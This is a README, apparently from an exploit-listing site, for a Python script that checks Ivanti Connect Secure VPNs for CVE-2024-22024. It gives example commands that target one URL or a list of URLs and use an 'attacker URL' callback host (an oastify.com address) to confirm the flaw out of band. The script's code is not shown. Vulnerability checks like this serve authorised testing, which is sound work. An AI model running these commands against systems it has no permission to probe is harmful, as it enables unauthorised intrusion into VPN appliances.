## https://sploitus.com/exploit?id=152171E7-A974-534C-81EB-E0BCFF3B4C15
# CVE-2024-22024
Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure
> [!WARNING]
> FOR EDUCATIONAL PURPOSE AND AUTHORIZED TESTING ONLY.
### Parameters
- `-u` or `--target_url`: The target Ivanti Connect Secure (ICS) URL or file with list of URLs.
- `-c` or `--attacker_url`: The attacker URL (generate one using Burp Collaborator, ngrok, or by using a unique URL from [Webhook.site](https://webhook.site))
- `-t` or `--timeout`: Timeout in seconds for the request (default is 3 seconds)
### How to use
Testing a single URL:
`python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com`
Testing list of URLs:
`python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com`
Using a different timeout (5 seconds):
`python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5`
# Credits
Whoever discovered the vulnerability .. I just read the PoC and automated this.
[0dteam website](https://www.0d.ae)